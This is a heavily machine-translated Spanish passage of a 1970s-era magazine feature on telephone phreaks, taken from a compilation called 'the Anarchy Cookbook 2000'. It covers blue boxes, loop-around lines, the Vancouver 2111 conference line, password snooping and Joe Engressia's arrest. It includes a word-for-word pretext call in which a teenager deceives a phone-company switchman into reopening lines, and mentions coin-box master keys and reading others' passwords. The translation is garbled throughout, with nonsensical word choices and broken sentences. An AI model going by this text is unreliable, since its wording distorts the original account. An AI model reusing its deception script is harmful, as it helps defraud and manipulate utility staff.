Pero cuando Randy comienza a hablar en una boquilla de teléfono su voz se vuelve tan increíblemente autoridad es necesario volver a mirar para convencerse de que proviene de un Randy gordita adolescente. Imagine la voz de una grieta plataforma petrolera capataz, un duro, fuerte y curtido hombre de Marlboro de cuarenta años. Imagine la voz de un brillante desempeño del fondo pistolero explicando cómo late el Dow Jones un treinta por ciento. Luego, imagine una voz que podría hacer que los dos como el sonido Stepin Fetchit. Eso es de dieciséis años de edad, Randy voz.

Él está hablando de un guardagujas en Detroit. La compañía de teléfonos en Detroit había cerrado dos gratuitos pares de bucle sin motivo aparente, a pesar de un uso

Page 213: 106652012 the Anarchy Cookbook 2000 Es

intensivo del teléfono por phreaks de todo el país pueden haber sido detectados. Randy está diciendo el guardavías cómo abrir el bucle y que sea libre de nuevo:

"¿Cómo estás, amigo. Sí. Estoy en la junta aquí en Tulsa, Oklahoma, y hemos estado tratando de hacer algunas pruebas en sus bucles-around y find'em ocupado por los dos lados ... . Sí, hemos estado recibiendo un "por" en ellos, ¿Qué quieres decir, se puede colocar las cartas sobre ellos? ¿Tiene usted 08 en su número de grupo? ¡Oh, está bien, hemos tenido este problema antes, puede que tengamos que ir tras el circuito de aquí déjame dales a usted:.. su marco es 05, vertical grupo 03, horizontal 5, archivo vertical 3 Sí, voy a colgar aquí .... Bueno, lo encontró? Bueno. Claro, sí, nos gustaría aclarar que fuera ocupado. Derecho. Todo lo que tienes que hacer es buscar su clave en la placa de montaje, es en su marco de tronco de varios. ¿de acuerdo? Derecho. Ahora tire de la llave de la NI más de la LCT. Sí. No sé por qué sucedió eso, pero hemos tenido problemas con eso. Bueno. gracias un chico mucho. ser seein 'ya ".

Randy cuelga, informa que el guardagujas era un poco inexperto con los circuitos de todo lazo en el marco del tronco varios, pero que el bucle ha sido devuelto a su libre estado de la llamada.

Encantado, teléfono Phreak Ed devuelve el par de números de la columna activa de estado en su directorio. Ed es un investigador excelente y minucioso. Con la minuciosidad casi talmúdica que se traza zarcillos de pistas a través de laberintos suave cable de la intervención telefónica-la empresa de vuelta a través de circuitos complejos vínculos de conmutación de los relés para encontrar la ubicación y la identidad de una sola línea gratuita bucle. Se pasa horas y horas, todos los días, haciendo este tipo de cosas. Él de alguna manera ha elaborado un directorio de 800 "Band-seis en los números WATS", ubicado en más de cuarenta estados. Seis Band-in-WATS números son los grandes números 800 - los que se pueden marcar en el libre de cualquier parte del país.

Ed el investigador, un estudiante de ingeniería de diecinueve años de edad, es también un técnico de calidad. Armó su caja azul de trabajo propia desde cero a la edad de diecisiete años. (. Está visto) Esta noche, después de la distribución de la última edición de su in-WATS directorio (que ha sido escrito en Braille para los ciegos phreaks del teléfono), anuncia que ha hecho un nuevo descubrimiento importante:

"Finalmente lo probado y funciona perfectamente. Tengo esta matriz de conmutación que convierte cualquier teléfono de tonos en un MF-er".

Los tonos que se escuchan en los teléfonos de marcación por tonos no son los tonos MF que operan el sistema de conmutación de larga distancia. Phreaks del teléfono creen AT & T. había equipado deliberadamente los tonos al tacto con un conjunto diferente de frecuencias para evitar poner a los seis maestros de tonos MF en las manos de todos los propietarios de marcación por tonos. De conmutación de matriz compleja de Ed pone los tonos principales seis, en efecto, poner una caja azul, en las manos de todos los propietarios de marcación por tonos.

Ed me muestra las páginas de esquemas, especificaciones y listas de piezas. "No es fácil de construir, pero aquí todo está en el catálogo Heathkit".

Ed pide Ralph: ¿Qué progresos ha hecho en sus intentos de restablecer una línea a largo plazo conferencia abierta para los phreaks del teléfono. La última conferencia grande - el histórico "2111", la conferencia - se había organizado a través de un télex sin usar la prueba a bordo del tronco en algún lugar de las entrañas de una máquina de conmutación 4A en Vancouver, Canadá. Para phreaks meses telefónicas podrían MF su camino en Vancouver, bip a cabo 604 (el código de área de Vancouver) y luego un pitido a 2111 (la interna del teléfono, Código de la Empresa para la prueba de Telex), y se encuentran en cualquier momento del día o de noche, en un hilo abierto a hablar con una serie de phreaks de teléfono de costa a costa, los operadores de Bermuda, Tokio y Londres que son phreaker-simpatizantes e invitados varios y expertos técnicos. La conferencia fue un intercambio masivo de información. Phreaks del teléfono elegido de cada uno de los cerebros de limpio, y luego desarrollado nuevas formas para recoger los cerebros de la compañía del teléfono limpio. Ralph dio MF conciertos Boogies con su entretenimiento en el hogar-tipo de órgano eléctrico, Captain Crunch demostró su vuelta

Page 214: 106652012 the Anarchy Cookbook 2000 Es

al mundo de proezas con su unidad computarizada notoria y se dejó caer miradas lascivas insinuaciones de la "acción" que estaba recibiendo a sus amigas. (El capitán vive o pretende vivir varios tipos de fantasías para el deleite de los chismosos phreaks ciegos de teléfono que le urgen a más triunfos en nombre de todos ellos.) El poco ruidosa noroeste Phreak teléfono público que su amarga interna derrame en contienda en la línea de la conferencia pacífica, la escalada de pronto en la guerra de guerrillas, Carl la Costa Este tono de las relaciones internacionales de expertos ha demostrado recién inaugurado rutas directas MF a las oficinas centrales de la isla de Bahrein en el Golfo Pérsico, presentó un nuevo teléfono-Phreak amigo de su, en Pretoria, y explicó el funcionamiento técnico de la nueva Oakland a los vínculos de Vietnam. (Phreaks Muchos teléfonos recoger a gastar dinero por MF-ción llamadas de familiares de soldados en Vietnam cobrando $ 5 por una hora de conversación a través del Pacífico.)

Día y noche la línea de la conferencia no estaba muerto. Phreaks ciegos de teléfono de todo el país, solitarios y aislados en casas llenas de activos hermanos y hermanas, videntes o atrapados con los niños ciegos lentos y faltos de imaginación camisa de fuerza en las escuelas para ciegos, sabía que no importa lo tarde que se podían marcar hasta la conferencia y encontrar instante comunión electrónica con dos o tres otros niños ciegos despierto más en el otro lado de América. Hablar juntos sobre una conexión de teléfono, los phreakers telefónicos ciegos decir, no es muy diferente de estar allí juntos. Físicamente, no había nada más que una oblea de dos pulgadas cuadradas de titanio dentro de una gran máquina en la isla de Vancouver. Para los niños ciegos> no <significó una estimulante sensación de estar en contacto, a través de un tipo de habilidad y la magia que era peculiarmente propio.

El pasado abril 1, sin embargo, el largo Conferencia de Vancouver se apagará. Los phreaks del teléfono sabía que iba a venir. Vancouver fue en el proceso de conversión de un sistema paso a paso a una máquina 4A y el circuito Télex 2111 iba a ser eliminado en el proceso. Los phreakers telefónicos aprendido el día mismo en que se borran de la conferencia de una semana antes de tiempo en las noticias interna-y-tienda-charla de la compañía telefónica la grabación.

Durante los siguientes siete días frenéticos cada phreaker en los Estados Unidos era dentro y fuera de la conferencia 2111 de veinticuatro horas al día. Phreaks del teléfono que estaban aprendiendo el juego, o no tienen capacidad de lunes a viernes se vieron impulsadas a la conferencia por phreaks más experimentados para que pudieran obtener una visión de lo que era antes de que desapareciera. Phreaks Top búsquedas en los códigos telefónicos distantes del área de nuevas posibilidades de conferencia sin éxito. Finalmente, en la madrugada del 01 de abril, llegó el final.

"Podía sentir que viene un par de horas antes de la medianoche", recuerda Ralph. "Se podía sentir algo que sucede en las líneas. Algunos estática comenzaron a aparecer, a continuación, algunos silbidos sibilancias. Luego hubo pausas. Algunas personas se cortó y llamó a la derecha de nuevo, pero después de un tiempo algunas personas se encuentran con que fueron cortadas apagado y no podía volver en absoluto. Fue terrible. lo perdido cerca de una de la madrugada, pero logró escapar de nuevo y permanecerá encendida hasta que la cosa murió ... creo que fue a las cuatro de la mañana. Había cuatro de nosotros todavía colgando de la conferencia, cuando desapareció en la nada para siempre. Todos tratamos de lunes a viernes hasta que de nuevo, por supuesto, pero nos dieron la terminación en silencio. No había nada allí. "

La legendaria marca Bernay resulta ser "El Skulker Medianoche"

Mark Bernay. Me había topado con ese nombre antes. Fue en la lista de selección Gilbertson de phreaks del teléfono. Los phreakers telefónicos de California había hablado de una marca misteriosa Bernay como tal vez el phreaker primera y más antigua en la costa oeste. Y, de hecho casi todos los phreaker en Occidente puede rastrear sus orígenes, ya sea directamente a Mark Bernay o un discípulo de Mark Bernay.

Parece que cinco años atrás, este Bernay Mark (un seudónimo que eligió para sí mismo) comenzó a viajar por toda la costa oeste de pegar pegatinas pequeñas en los directorios telefónicos a lo largo de su camino. Las pegatinas de leer algo como "¿Quieres oír una grabación de la cinta interesante? Llame a estos números." Los números que siguieron

Page 215: 106652012 the Anarchy Cookbook 2000 Es

fueron gratuito en bucle alrededor de pares. Cuando uno de los curiosos como uno de los números que se oye una grabación de pre-forma de gancho en el circuito de Bernay que explicaba el uso de bucles en torno a pares, dio los números de varios más, y terminó diciéndole a la persona que llama, "En seis de esta noche esta grabación se detendrá y tú y tus amigos pueden probarlo. Que se diviertan ".

"Me ha decepcionado por la respuesta en un primer momento," me dijo Bernay, cuando por fin le llegó en uno de sus muchos números y había prescindido de la costumbre "Nunca hago nada ilegal" las formalidades que experimentaron phreaks teléfono abrir la mayoría de las conversaciones.

"Me fui por toda la costa con estos adhesivos no sólo en los teléfonos públicos, pero me gustaría tirar delante de las escuelas secundarias en el medio de la noche, me gustaría dejarlos discretamente en tiendas de dulces, se las extiende en las calles principales de las pequeñas ciudades. Al principio casi nadie se molestó en intentarlo. Me gustaría escuchar durante horas y horas después de las seis y nadie se encendió. Yo no podía entender por qué la gente no estaría interesado. Finalmente estas dos chicas en Oregon, lo probé y le dijo a todos sus amigos y de repente comenzó a extenderse. "

Antes de su viaje de Johny Appleseed Bernay ya se había reunido un grupo considerable de principios de pre-azul-caja del teléfono phreaks juntos en loop-around en Los Ángeles. Bernay no reclama crédito por el descubrimiento original de los números de todo lazo. Él atribuye el descubrimiento de un niño de reforma de dieciocho años de edad, la escuela en Long Beach, cuyo nombre se olvida y que, dice, "acaba de desaparecer un día." Cuando se descubrió a sí mismo bucle Bernay-around de forma independiente, a partir de pistas en sus lecturas de viejos problemas de la técnica automática Diario eléctrica, se encontró con decenas de amigos del chico la reforma de la escuela de la que ya los utilizan. Sin embargo, fue uno de los discípulos de Bernay en Seattle que introdujeron phone phreaking a los niños ciegos. El chico de Seattle que se enteró a través de lazos de grabación de Bernay le dijo a un amigo ciego, el niño ciego enseñó el secreto a sus amigos en un campamento de invierno para los niños ciegos en Los Ángeles. Cuando la sesión de campamento fue en estos niños tomaron la parte trasera secreta a los pueblos de todo el Occidente. Así es como los niños ciegos originales se convirtieron en phreaks del teléfono. Para ellos, para la mayoría de los phreaks del teléfono en general, fue el descubrimiento de las posibilidades de loop-around que les llevó a mucho más graves y sofisticados métodos de phreaker, y que les daba un medio para compartir sus descubrimientos.

Un año más tarde un niño ciego que se movió de nuevo la técnica oriental trajo al campamento de verano para niños ciegos 'en Vermont, que se extendió a lo largo de la costa este. Todo a partir de una etiqueta de Bernay Mark.

Bernay, que es casi treinta años de edad ahora, inició su carrera cuando tenía quince años y su familia se mudó a un suburbio de Los Angeles atendidos por el General de teléfono y equipos electrónicos. Se quedó fascinado con las diferencias entre Bell y GT & E. equipo. Se enteró de que podía hacer cosas interesantes por los clics cuidadosamente sincronizados con el botón de desenganche. Aprendió a interpretar las sutiles diferencias en la serie de chasquidos, zumbidos y kachinks pudo oír en sus líneas. Él se enteró de que podía pasar en torno a los relés de conmutación del código de área de Los Ángeles de una manera no muy predecible por intercalando sus propios conmutadores de gancho con los clics clics dentro de la línea. (Las compañías telefónicas independientes - hay 1.900 de ellos todavía a la izquierda, la mayoría de ellos pequeñas islas en los principados vasto imperio de Ma Bell - siempre han sido los favoritos de los phreaks del teléfono, primero como herramientas de aprendizaje, a continuación, como plataformas de Arquímedes desde el que manipular el sistema de enorme campana. Un phreaker en el territorio de Bell a menudo MF a sí mismo en un sistema de conmutación independiente, con el cambio idiosincrasias que le pueden dar el apalancamiento maravillosa sobre el sistema de Bell.

"Tengo un afecto real por Equipo eléctrico automático", me dijo Bernay. "Hay un montón de cosas que usted puede jugar. Las cosas se descomponen en formas muy interesantes."

Page 216: 106652012 the Anarchy Cookbook 2000 Es

Poco después de Bernay se graduó de la universidad (con una doble licenciatura en química y filosofía), se graduó de phreaking en torno a GT & E. el sistema de Bell sí mismo, e hizo su legendaria etiqueta y pegar viaje hacia el norte a lo largo de la costa, estableciéndose finalmente en el territorio noroeste del Pacífico Bell. Descubrió que si Bell no se estropea tan interesante como GT & E, no obstante, ofrece una gran cantidad de "cosas para jugar."

Bernay aprendido a jugar con cajas azules. Estableció su propia centralita personal y el teléfono-Phreak complejo de investigación de laboratorio. Continuó su teléfono Phreak la evangelización con las campañas de pegatinas en curso. Creó dos números de registro, uno con las instrucciones para el comienzo de phreaks del teléfono y el otro con las últimas noticias y avances técnicos (junto con algo de instrucción avanzada) se reunieron a partir de fuentes de todo el país.

En estos días, me dijo Bernay, que había ido más allá de sí mismo teléfono phreaking. . "Últimamente he estado disfrutando de jugar con los ordenadores más que jugar con los teléfonos de mi cosa personal en las computadoras es lo mismo que con los teléfonos, supongo - la patada consiste en encontrar la manera de vencer al sistema, cómo llegar a las cosas que me no debo saber acerca de, cómo hacer las cosas con el sistema que yo no tengo que ser capaz de hacer. "

Como cuestión de hecho, me dijo Bernay, que acababa de ser despedido de su equipo de programación de trabajo para hacer las cosas que no se suponía que debía ser capaz de hacer. Él había estado trabajando con un gran tiempo compartido equipo propiedad de una corporación grande, pero compartida por muchos otros. El acceso a la computadora se limita a los programadores y las empresas que habían sido asignadas ciertas contraseñas. Y cada contraseña de usuario restringido su acceso a sólo la sección uno de la computadora acordonada desde su storager propia información. El sistema de contraseñas impedido que las empresas y los individuos de robar información de cada uno.

"Me di cuenta de cómo escribir un programa que me permitiera leer el resto de la contraseña," los informes de Bernay. "Empecé a jugar con las contraseñas. Empecé dejando que las personas que utilizan el ordenador sabe, de manera sutil, que sabía sus contraseñas. Que comenzaron a caer las notas a los supervisores de ordenador con notas que yo sabía lo que sé. Que los firmó" El Skulker la medianoche. " Guardé el conseguir más inteligente y más hábil con mis mensajes y la elaboración de formas de mostrar que lo que podía hacer. Estoy seguro de que no podía imaginar lo que podía hacer las cosas que yo les estaba mostrando. Pero nunca me respondió. De vez en mientras que cambies la contraseña, pero he encontrado la manera de descubrir lo que los nuevos eran, y les hice saber. Sin embargo, nunca respondió directamente a la Skulker medianoche. Incluso, finalmente diseñó un programa que se podría utilizar para evitar que mi el programa se entere de lo que hizo. En efecto, les dije cómo me absorbían, El Skulker medianoche. Fue un programa muy inteligente. empecé dejando pistas acerca de mí mismo. Quería que tratar de usarlo y luego tratar de llegar con algo para conseguir alrededor de eso y vuelven a aparecer de nuevo. Pero no iba a jugar. Quería quedar atrapado. Quiero decir que yo no quería quedar atrapado personalmente, pero yo quería que se fijara en mí y admito que me di cuenta. Yo quería que intentan responder, tal vez de alguna manera interesante. " Por último, los administradores informáticos se preocupó lo suficiente acerca de la amenaza del robo de la información para responder. Sin embargo, en lugar de utilizar el Skulker la medianoche del propio elegante auto-destrucción del programa, llamaron a su personal de seguridad, todos los interrogados, que se encuentra un informante para identificar Bernay como el Skulker la medianoche, y lo despidieron.

"Al principio la gente de seguridad informó a la empresa que me contrate de tiempo completo a buscar otras fallas y descubre los monstruos de otros ordenadores. Me hubiera gustado eso. Pero probablemente se habría convertido en un agente doble doble en lugar de la doble agente que quería . podría haber resucitado el Skulker medianoche y traté de atraparlo. ¿Quién sabe? De todos modos, los de arriba se volvió la idea abajo. "

Puede tocar la computadora del FBI de Control del Crimen en la comodidad de su propio hogar, tal vez.

Page 217: 106652012 the Anarchy Cookbook 2000 Es

Maldita computadora puede ser la ola del futuro. Se adapta a la sensibilidad de teléfono-Phreak perfectamente. Gilbertson, el inventor de la caja azul y un phreaker de toda la vida, también ha ido desde el teléfono a la computadora-phreaking-maldita. Antes de que él se metió en el negocio de Gilbertson caja azul, que es un programador altamente capacitado, los programas concebidos para el arbitraje internacional de divisas.

Pero él comenzó a jugar con las computadoras en serio cuando se enteró de que podía usar su caja azul en conjunto con el terminal de ordenador instalado en su apartamento por la firma de los instrumentos que trabajaba. El terminal de salida de impresión y el teclado estaba equipado con acoplamiento acústico, de manera que mediante el acoplamiento de su pequeña princesa de marfil de teléfono a la terminal y luego acoplar la caja azul en la que, lo que pudo MF su camino en otros ordenadores con el anonimato completo, y sin costo; programa y que volver a programar a voluntad, darles de comer información falsa o engañosa; toque y robarles. Me explicó que él aprovecha las computadoras por ocupándose todas las líneas, a continuación, entrar en un tronco de verificación, escuchando a las contraseñas y las instrucciones de uno de los partícipes de tiempo los usos, y los MF-ción de e imitarlos. Él cree que no sería imposible que se meten en las computadoras del FBI en lucha contra la delincuencia a través de un terminal de la policía y el equipo local Phreak en torno a los bancos de memoria del FBI. Afirma que ha tenido éxito en el restablecimiento de la programación de un determinado equipo institucional enorme, de tal manera que se ha acordonado una sección completa de su sistema de circuitos para su uso personal, y al mismo tiempo, los oculta que el arreglo de cualquier otra persona de previo aviso. No he podido verificar esta afirmación.

Al igual que Captain Crunch, al igual que Alexander Graham Bell (seudónimo de un ingeniero de descontentos de aspecto de la Costa Este que dice haber inventado el cuadro negro y ahora vende las cajas negras y azul para los jugadores y los heavies radicales), al igual que la mayoría de los phreakers telefónicos, Gilbertson comenzó su carrera tratando de para estafar a los teléfonos públicos como un adolescente. Pensar en ellos, y luego los estafa. Obtención de la espalda centavo desde el teléfono público es el phreaker de primer rito de paso emocionante. Después de enterarse de los habituales dieciocho maneras diferentes de conseguir su espalda moneda de diez centavos, Gilbertson aprendido a hacer llaves maestras para las cajas de efectivo de teléfono de monedas, y obtener todos los demás monedas de diez centavos de vuelta. Se robó algunos equipos de teléfono de empresas y formar su cuadro de distribución propia casa con ella. Aprendió a hacer una simple "pan de caja" del dispositivo, del tipo de los utilizados por los corredores de apuestas en los años treinta (casa de apuestas ofrece una serie a sus clientes de apuestas, y el teléfono con ese número se ha instalado en el apartamento de una señora viuda, pero está amañado para que suene en la tienda del corredor de apuestas del lado de la ciudad, la policía rastro grandes apuestas número y no encuentran nada, pero la viuda).

No mucho tiempo después de aquella tarde en 1968, cuando, en el fondo en las estanterías de una biblioteca de ingeniería, se encontró con una revista técnica con las frecuencias de teléfonos de tono y salió corriendo a hacer su primera caja azul, no mucho después de que Gilbertson abandonó una prometedora carrera en el Química Física y empezó a vender cajas azules por $ 1,500 cada uno.

"Tuve que dejar la química física. Sólo se quedó sin cosas interesantes que aprender", me dijo una noche. Habíamos estado hablando en el apartamento del hombre que sirvió de enlace entre Gilbertson y el sindicato en la organización de la gran 300.000 dólares de la caja azul acuerdo que fracasó a causa de problemas legales. Ha habido un cierto hábito de fumar.

"No hay cosas más interesantes que aprender", continúa. "Química Física resulta ser un sujeto enfermo al que los lleve a su nivel más alto. No sé. Yo no creo que me podría explicar con exactitud lo que está enfermo. Usted tiene que estar allí. Pero te vas, yo no sé, una falsa sensación de omnipotencia. Supongo que es como el teléfono phreaking de esa manera. esta enorme cosa está ahí. Todo este sistema. Y hay agujeros en ella y que no caer en ellas al igual que Alicia y que está fingiendo que estás haciendo algo

Page 218: 106652012 the Anarchy Cookbook 2000 Es

que no está hecho, o por lo menos ya no es lo que está haciendo lo que usted pensaba que estaba haciendo. Se trata de Lewis Carroll. Química Física y el teléfono phreaking. Es por eso que usted tiene estos seudónimos phreaker-como The Cheshire Gato, el Rey Rojo, y el Snark. Pero hay algo sobre el teléfono phreaking-que no encontramos en la química física. " Él me mira:

"¿Alguna vez has robado nada?"

"Bueno, sí, I. .."

"Entonces usted sabe! Usted sabe las prisas que te dan. No es sólo el conocimiento, como la química física. Está prohibido del conocimiento. Usted sabe. Usted puede aprender casi cualquier cosa bajo el sol y se aburre a muerte con él. Pero la idea de que es ilegal . Mire: usted puede ser pequeño y móvil e inteligente y que está estafando a alguien grande y poderoso y muy peligroso ".

La gente como Gilbertson y Alexander Graham Bell siempre están hablando acerca de la copia de la compañía telefónica y atornillar Ma Bell. Pero si se les mostró un único botón y dijo que empujándolo que podría convertir el circuito completo de AT & T. en los charcos de fundición, es probable que no lo presione. El phreaker descontentos-inventor necesita el sistema telefónico de la forma en que el católico no practicante necesita a la Iglesia, la manera en que Satanás necesita un Dios, el camino El Skulker medianoche es necesario, más que nada, la respuesta.

Más tarde esa noche Gilbertson terminó de contarme lo encantado que estaba en la inundación de las cajas azules se extienden por todo el país, lo encantado que estaba de saber que "esta vez está realmente jodido." De repente, cambió de marcha.

"Por supuesto. Tengo este amor / odio lo de Ma Bell. En cierto modo, casi como la compañía telefónica. Creo que sería muy triste si fueran a desintegrarse. En cierto modo, es justo que después de haber sido tan bien que llegar a tener estas cosas mal con ellos. Son esos defectos que me permiten entrar y meterse con ellos, pero yo no lo sé. Hay algo en lo que llega a ti y te dan ganas de llegar a ella, ya sabes. "

Le pregunto qué sucede cuando se queda sin interés, las cosas prohibidas para aprender sobre el sistema telefónico.

"No sé, tal vez me vaya a trabajar para ellos durante un tiempo."

"En seguridad, incluso?"

"Yo lo haría, seguro de que tan pronto jugar -. Que acababa tan pronto trabajar en cualquier lado."

"Incluso encontrar la manera de atrapar a phreaks de teléfono? Dije, recordando juego de Mark Bernay de."

"Sí, eso podría ser interesante. Sí, podría encontrar la manera de burlar a los phreakers telefónicos. Por supuesto, si tengo muy buenos en eso, se podría llegar a ser aburrida de nuevo. Entonces tendría que esperar a los phreakers telefónicos eran mucho mejor y yo más listo que durante un tiempo. que se movería la calidad del juego hasta un nivel. que incluso podría tener que ayudarles a salir, ya sabes, 'Bueno, chicos, yo no quiero esto para moverse pero ¿sabía usted que cada vez de -? Pude mantenerlo en marcha en los niveles más altos para siempre. "

El distribuidor habla por primera vez. Ha estado mirando los patrones de parpadeo suave de la luz y los colores en la pared translúcida de baldosas frente a él. (En realidad no hay patrones: el color y la iluminación de cada pila se determina por un sistema computarizado generador de números aleatorios diseñado por Gilbertson, que asegura que no puede haber ningún significado a cualquier secuencia de eventos en los azulejos.)

"Esos son juegos buenos que estamos hablando", dice el distribuidor a su amigo. "Pero no me importaría verlas jodido. Un teléfono no es privada más. No se puede decir lo que

Page 219: 106652012 the Anarchy Cookbook 2000 Es

realmente quiere decir en un teléfono o tiene que pasar por esa paranoia mierda." ¿Es fresco para hablar el teléfono? ' Quiero decir, incluso si es fresco, si usted tiene que preguntar "¿Está bien", entonces no es fresco. Ya lo sabes. "Es genial", entonces no es fresco. Usted sabe. Al igual que los niños ciegos , la gente va a empezar a armar sus propias compañías telefónicas privadas si se quiere hablar de verdad. ¿Y sabes qué más. No se oye silencio en el teléfono nunca más. Tienen esa cosa de tiempo compartido a larga distancia líneas en las que usted hace una pausa y tijeretazo a ese pedazo de tiempo y lo utilizan para llevar a parte de otra persona conversation.Instead de una pausa, donde alguien está respirando o quizá suspirando, se obtiene de este agujero en blanco y sólo se comienza a escuchar de nuevo cuando alguien dice una palabra e incluso el principio de la palabra se corta silencios no cuentan -.. usted está pagando por ellos, pero se los llevan lejos de ti que no es bueno para hablar y usted no puede oír a alguien cuando no hables. ¿Qué diablos sirve el teléfono? no me importaría verlas bien jodida ".

El Big Bust Memphis

Joe Engressia no quería volver a enroscar Ma Bell. Su sueño siempre había sido trabajar para ella.

El día que visité a Joe en su pequeño apartamento en Union Avenue en Memphis, estaba molesto por otro revés en su solicitud de un puesto de trabajo por teléfono.

"Están estancamiento en él. Recibí una carta que hoy me dice que tendría que posponer la entrevista que le pidió de nuevo. Mi casero que lea por mí. Me dio un poco evasivas sobre el deseo de documentos sobre el estado de mi rehabilitación, pero creo que hay algo más está sucediendo. "

Cuando me encendió la bombilla de 40 vatios en la habitación de Joe - a veces se olvida cuando tiene invitados - que se miraba como si no hubiera hardware telefónico suficiente para iniciar una pequeña empresa de telefonía propia.

Hay un teléfono en la parte superior de su escritorio, un teléfono sentado en un cajón abierto por debajo de la parte superior del escritorio. Al lado del teléfono de sobremesa es un dispositivo de lunes a viernes caja de puros de tamaño con grandes interruptores de palanca, y al lado de esto es algún tipo de conexión y un dispositivo de acoplamiento con los gatos y cocodrilos se conecta suelto. Al lado de eso es una máquina de escribir Braille. En el piso al lado de la mesa, tumbado boca abajo como una tortuga muerta, es el órgano de medio destripado de un viejo teléfono negro estándar. A través de la sala en un sofá roto y polvoriento dos teléfonos más, uno de ellos un modelo de marcación por tonos, dos grabadoras, un montón de parches de teléfono y casetes, y un teléfono de juguete de tamaño natural.

Nuestra conversación se interrumpe cada diez minutos por teléfono phreaks de todo el país llamando a Juan en casi todas las piezas del equipo, pero el teléfono de juguete y la máquina de escribir Braille. Uno de catorce años de edad, niño ciego de Connecticut llama y le dice a Joe que tiene una amiga. Él quiere hablar con Joe acerca de amigas. Joe dice que va a hablar más tarde en la noche cuando se puede estar solo en la línea. Joe dibuja un profundo aliento, silbidos él fuera del aire con un ensordecedor 2600-ciclo de silbato. Joe tiene el placer de recibir las llamadas, pero parecía preocupado y preocupado por la noche, con el ceño fruncido constante por encima de sus ojos negros errantes. Además de la cabina de teléfono-empresa, que acaba de enterarse de que su edificio de apartamentos se debe a ser demolida en los sesenta días para la renovación urbana. A pesar de su desaliño, la casa de la avenida Unión apartamento ha sido el primero en casa de Joe-de-su-propia y que está preocupado de que no puede encontrar otro antes de que ésta sea demolida.

Pero lo que realmente le molesta es que Joe guardagujas no ha estado escuchando a él. "He estado haciendo algunas comprobaciones en los números 800, últimamente, y he descubierto que ciertos números 800 en New Hampshire no pudo ser contactado de Missouri y Kansas. Ahora bien, puede sonar como una cosa pequeña, pero no me gusta para ver el trabajo descuidado, sino que me hace sentir mal acerca de las líneas Así que he estado llamando a las oficinas de conmutación y presentación de informes, pero no lo han

Page 220: 106652012 the Anarchy Cookbook 2000 Es

corregido los llamé por tercera vez hoy y en lugar de comprobar que justo.. se enojó Bueno, eso me pone loca Quiero decir, no tratar de ayudarlos Hay algo en ellas que no puedo entender -.... quiere ayudarlos y que sólo tratan de decir que los está defraudando "

Es domingo por la noche y Joe me invita a unirse a él para la cena en un Holiday Inn. Con frecuencia el domingo por la noche Joe toma parte de su dinero el bienestar, llama a un taxi, y trata a sí mismo a una cena de carne asada en uno de los Holiday Inns trece de Memphis. (Memphis es la sede del Holiday Inn. Holiday Inns han sido un favorito de Joe desde que hizo su primer viaje en solitario de teléfono a una oficina de cambio de Bell, en Jacksonville, Florida, y nos alojamos en el Holiday Inn allí. Le gusta estar en el Holiday Posadas, explica, porque representan la libertad a él y porque las habitaciones están dispuestas de la misma en todo el país para que sepa que cualquier sala de Holiday Inn es un territorio familiar para él. Al igual que cualquier teléfono.)

Sobre los bistecs en el restaurante Pinnacle del Holiday Inn Medical Center en Madison Avenue en Memphis, Joe me dice que los mejores momentos de su vida como un phreaker.

A los siete años, Joe aprendió el truco primer teléfono. Una media de baby-sitter, cansado de escuchar a la pequeña obra de Joe con el teléfono, como hacía siempre, constantemente, poner un candado en el dial de teléfono. "Me puse tan furioso. Cuando hay un teléfono sentado allí y no lo puedo usar ... así que empecé a enojarse y golpear el receptor arriba y hacia abajo. Me di cuenta de que lo golpeó una vez y marcó uno. Bueno, entonces yo lo intentó golpear dos veces .... " En pocos minutos, Joe aprendió a marcar pulsando el interruptor de gancho en el momento adecuado. "Yo estaba tan emocionada que recuerdo haber ido" whoo whoo 'y golpearon a una caja en el suelo. "

A los ocho años de Joe aprendido acerca de silbar. "Yo estaba escuchando algo de intercepción que no trabajan número de grabación en Los Angeles-me estaba llamando a LA ya en eso, pero sobre todo había marcar los números que no trabajan porque no había ningún cargo, y me gustaría escuchar estas grabaciones durante todo el día . Bueno, yo estaba silbando porque escuchar estas grabaciones puede ser aburrido después de un tiempo, incluso si son de Los Ángeles, y, de repente, en medio de silbidos, la grabación se cortó. Jugué silbar un poco más, y sucedió lo mismo. Así que llamé a la sala de interruptor y dijo: 'Yo soy Joe. Tengo ocho años de edad y quiero saber por qué cuando me silban esta canción fuera de la línea de clics. Trató de explicar a mí, pero era un poco demasiado técnico en el momento. Me fui en el aprendizaje. Eso fue una cosa que nadie me iba a dejar de hacer. Los teléfonos eran mi vida, y yo iba a pagar cualquier el precio de seguir aprendiendo. Yo sabía que podía ir a la cárcel. Pero yo tenía que hacer lo que tenía que hacer para seguir aprendiendo. "

El teléfono está sonando, cuando caminamos de regreso en el apartamento de Joe en Union Avenue. Se trata de Captain Crunch. El capitán me ha estado siguiendo todo por teléfono, llamando a todas partes voy con bits adicionales de asesoramiento y una explicación para mí y para cualquier teléfono Phreak me ocurre que se visita. Esta vez, el capitán informa que está llamando desde lo que él describe como "mi refugio por alto en la Sierra Nevada". Él impulsos lujuriosos con salvas de lunes a viernes y Joe dice que está a punto de "salir y conseguir esta noche un poco de acción. Haga un poco de phreaking de otro tipo, si sabes lo que quiero decir." Joe se ríe.

El capitán me dice que para asegurarse de que entienden que lo que me dijo de atar las líneas telefónicas de la nación era cierto, pero que él y los phreakers telefónicos que sabía nunca se utiliza la técnica de sabotaje. Ellos sólo aprendió la técnica para ayudar a la compañía telefónica.

"Hacemos un montón de reparación para ellos. ¿Te gusta esta New Hampshire / Missouri WATS línea defecto que he estado gritando alrededor. Les ayudamos a más de lo que sé".

Después de decir adiós al capitán y silbidos Joe le fuera de la línea, Joe me habla de un sueño perturbador que tuvo la noche anterior: ". Que había sido capturado y me llevaban a la cárcel Fue un viaje largo. Ellos me llevaban a la cárcel un largo camino lejos. Y nos detuvimos en un Holiday Inn y era mi última noche siempre de usar el

Page 221: 106652012 the Anarchy Cookbook 2000 Es

teléfono y yo estaba llorando y llorando, y dijo que la dama en el Holiday Inn, 'Dios, la miel , nunca debe estar triste en un Holiday Inn. Usted siempre debe ser feliz aquí. Sobre todo porque es su última noche. Y eso sólo empeoró las cosas y yo estaba llorando tanto que no podía soportarlo. "

Dos semanas después de que salí del apartamento de Joe Engressia, la compañía telefónica los agentes de seguridad y la policía de Memphis se rompió en ella. Armado con una orden judicial, que dejó clavado en una pared, confiscaron todos los equipos en la sala, incluyendo su teléfono de juguete. Joe fue puesto bajo arresto y llevado a la cárcel de la ciudad, donde se vio obligado a pasar la noche ya que no tenía dinero y no conocía a nadie en Memphis para llamar.

